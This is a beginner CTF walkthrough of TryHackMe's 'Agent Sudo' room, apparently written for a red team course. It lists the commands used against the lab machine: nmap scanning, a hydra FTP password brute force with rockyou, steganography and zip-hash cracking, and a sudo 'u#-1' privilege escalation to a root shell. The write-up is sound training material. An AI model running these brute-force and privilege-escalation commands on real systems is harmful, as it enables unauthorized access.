TryHackMe Agent Sudo room walkthrough

This is a write up covering steps taken to solve a beginner level security challenge Agent Sudo room in TryHackMe platform.

This blog is written as part of task of Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine

1. Download OpenVPN configuration setting from TryHackMe platform
2. Connect to TryHackMe by running the command in kali terminal:

sudo openvpn /pathtoOVPNfile.ovpn

3. Start machine in ‘Agent sudo’ room — target ip address will be displayed in a minute.

https://tryhackme.com/room/agentssudoctf

Step 2 : Information gathering using Nmap

1. Start nmap scan of the target ip:

nmap -A -O <target ip>

Step 3: Detailed Findings

Open ports:

21 : FTP

22 : SSH

80 : http

1. Accessing port 80 http

View source code > No info found

2. Navigating to robots.txt > No details found

3. Using dirbuster to find directories and files > Found nothing interesting

4. Observing the message in port 80, used curl to get details

curl -A -L <targetip>

5. As the message suggest using own ‘user-agent’ and signature suggests that codename is alphabet, so trying to use curl with -A flag and different alphabets

curl -A “A” -L <targetip>

curl -A “B” -L <targetip>

curl -A “C” -L <targetip> found agent name chris

6. As FTP port open, trying to brute force using hydra to identified FTP credentials

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.208.107 ftp 21

7. Logging into FTP using above findings > Found 3 files > copied all 3 files to local machine

ftp <targetip>

Get <filename>

8. Opening the copied files

9. Based on above hint now tying to extract data from other 2 image files using stegextract.

Extracting files from images

binwalk cutie.jpg -e

Found _cutie.jpg.extracted > which had 4 files

Cracking .zip file using zip2john

zip2john 8702.zip >test.txt

cracking the hash in test.txt using john > found password to open zip file

john test.txt

Extracting 8702.zip using 7z

7z e 8702.zip

cat To_agentR.txt

Found message to extract files from cute-alien.jpg

Used cyberchef to crack the hint.

Used steghide to extract hidden message

steghide extract -sf cute-alien.jpg

Found passowrd for agent james

10. Using above information for logging into SSH port with user james and found password > SSH logi successful

ssh james@<targetip>

11. Found User_flag.txt

12. Checking for privileges, sudo -l

13. Got root access

sudo -u#-1 /bin/bash

Found root.txt

With these steps, I was able to answer all questions posted in agent sudo room on TryHackMe.

Thank you for reading this blog..